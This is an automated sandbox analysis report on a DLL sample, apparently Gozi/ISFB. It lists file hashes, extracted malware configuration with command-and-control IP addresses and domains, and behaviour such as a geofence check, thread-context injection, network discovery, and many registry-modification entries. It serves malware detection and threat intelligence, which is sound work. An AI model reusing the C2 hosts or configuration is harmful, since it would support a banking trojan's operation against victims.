Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
03-08-2022 09:30
Static task
static1
Behavioral task
behavioral1
Sample
62ea3f935563b.dll
Resource
win7-20220715-en
General
-
Target
62ea3f935563b.dll
-
Size
300KB
-
MD5
614e312af0e5de7c6b9819e3a1c766d4
-
SHA1
01e384618d8eadb244184e66e6450752ea0ceade
-
SHA256
982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203
-
SHA512
362b32fbc61baf1c757f72d61e582e2741553eda4de022311757a0732a23edabafbcd6affdab97c49d5e1378587b16f1d6730fd9446c801d791056896414d302
Malware Config
Extracted
gozi_ifsb
3000
config.edge.skype.com
37.120.206.71
37.120.206.84
193.106.191.163
-
base_path
/drew/
-
build
250240
-
exe_type
loader
-
extension
.jlk
-
server_id
50
Extracted
gozi_ifsb
3000
37.120.206.91
37.120.206.95
havefuntxmm.at
5.42.199.57
xerkdeoleone.at
-
base_path
/images/
-
build
250240
-
exe_type
worker
-
extension
.jlk
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process target process PID 4384 set thread context of 2648 4384 powershell.exe Explorer.EXE PID 2648 set thread context of 3444 2648 Explorer.EXE RuntimeBroker.exe PID 2648 set thread context of 3788 2648 Explorer.EXE RuntimeBroker.exe PID 2648 set thread context of 4408 2648 Explorer.EXE RuntimeBroker.exe PID 2648 set thread context of 5096 2648 Explorer.EXE RuntimeBroker.exe PID 2648 set thread context of 5000 2648 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 3 IoCs
Processes:
net.exenet.exenet.exepid process 4836 net.exe 4216 net.exe 3248 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Modifies registry class 64 IoCs
Processes:
RuntimeBroker.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d3535f7-b45f-4e2b- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4fbddba7-5cb2-42b6- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e94784b92ca7d801c1a6e3b92ca7d801c1a6e3b92ca7d8018ff70a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355115c2000616464343033306661653061393663656564306564353033396534366236323936653839346662326639383863393865346539383038623337623662633565320000b20009000400efbe0355115c0355115c2e00000000000000000000000000000000000000000000000000ab059900610064006400340030003300300066006100650030006100390036006300650065006400300065006400350030003300390065003400360062003600320039003600650038003900340066006200320066003900380038006300390038006500340065003900380030003800620033003700620036006200630035006500320000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008a22f97a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61646434303330666165306139366365656430656435303339653436623632393665383934666232663938386339386534653938303862333762366263356532000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a7314d89cea08ed11b78d56b8b6dcaeaebca7cefcc5848241ae2fb45b654f157a7314d89cea08ed11b78d56b8b6dcaeaece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4cf88311-6fdd-4d3b- = "8324" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa81ba26-2b77-4c42- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa81ba26-2b77-4c42- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000007a54abb82ca7d8017a54abb82ca7d8017a54abb82ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355115c2000613035646464333661333564343164383430373133346465643431623833313931366236336530346363626463336465313134313733353436646536363639330000b20009000400efbe0355115c0355115c2e0000000000000000000000000000000000000000000000000086a0d400610030003500640064006400330036006100330035006400340031006400380034003000370031003300340064006500640034003100620038003300310039003100360062003600330065003000340063006300620064006300330064006500310031003400310037003300350034003600640065003600360036003900330000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008a22f97a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61303564646433366133356434316438343037313334646564343162383331393136623633653034636362646333646531313431373335343664653636363933000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a6914d89cea08ed11b78d56b8b6dcaeaebca7cefcc5848241ae2fb45b654f157a6914d89cea08ed11b78d56b8b6dcaeaece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\662b2298-f70d-4172- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\662b2298-f70d-4172- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4cf88311-6fdd-4d3b- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84484181-4d51-4a9a- = 61e70bb92ca7d801 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84484181-4d51-4a9a- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69a3c2e2-768b-4fa4- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84484181-4d51-4a9a- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69a3c2e2-768b-4fa4- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\add4030fae0a96ceed0ed5039e46b6296e894fb2f988c98e4e9808b37b6bc5e2" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67e3704f-6c17-41eb- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000f43bf5b82ca7d801f43bf5b82ca7d801f43bf5b82ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355115c2000613133313765333937613733663438643164653337316665663065666561653430653539613064343466663639356264303031646164393033303736383735360000b20009000400efbe0355115c0355115c2e000000000000000000000000000000000000000000000000000cb98a00610031003300310037006500330039003700610037003300660034003800640031006400650033003700310066006500660030006500660065006100650034003000650035003900610030006400340034006600660036003900350062006400300030003100640061006400390030003300300037003600380037003500360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008a22f97a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61313331376533393761373366343864316465333731666566306566656165343065353961306434346666363935626430303164616439303330373638373536000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a6b14d89cea08ed11b78d56b8b6dcaeaebca7cefcc5848241ae2fb45b654f157a6b14d89cea08ed11b78d56b8b6dcaeaece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3adca56c5abdcdb858510c61faa733008065d521ca4a91ca9d66e6d6b0a95b3c" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4cf88311-6fdd-4d3b- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a05ddd36a35d41d8407134ded41b831916b63e04ccbdc3de114173546de66693" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e02ef476-262e-4b5a- = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d3535f7-b45f-4e2b- = "0" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\662b2298-f70d-4172- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\323e5136-11f4-4ce9- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69a3c2e2-768b-4fa4- = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d3535f7-b45f-4e2b- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67e3704f-6c17-41eb- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84484181-4d51-4a9a- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e02ef476-262e-4b5a- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e02ef476-262e-4b5a- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\37a5dc662a21e2e4f39235304b188e73bc2e198a60d3cbaa712dc378bc941121" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4fbddba7-5cb2-42b6- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69a3c2e2-768b-4fa4- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5072bc72-5364-4bd5- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a1317e397a73f48d1de371fef0efeae40e59a0d44ff695bd001dad9030768756" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4fbddba7-5cb2-42b6- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\add4030fae0a96ceed0ed5039e46b6296e894fb2f988c98e4e9808b37b6bc5e2" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000006fc56b92ca7d801ca5bd5b92ca7d801ca5bd5b92ca7d80173b508000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355115c2000336164636135366335616264636462383538353130633631666161373333303038303635643532316361346139316361396436366536643662306139356233630000b20009000400efbe0355115c0355115c2e00000000000000000000000000000000000000000000000000b42f8100330061006400630061003500360063003500610062006400630064006200380035003800350031003000630036003100660061006100370033003300300030003800300036003500640035003200310063006100340061003900310063006100390064003600360065003600640036006200300061003900350062003300630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008a22f97a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33616463613536633561626463646238353835313063363166616137333330303830363564353231636134613931636139643636653664366230613935623363000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a7214d89cea08ed11b78d56b8b6dcaeaebca7cefcc5848241ae2fb45b654f157a7214d89cea08ed11b78d56b8b6dcaeaece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa81ba26-2b77-4c42- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67e3704f-6c17-41eb- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67e3704f-6c17-41eb- RuntimeBroker.exe Set value (str) 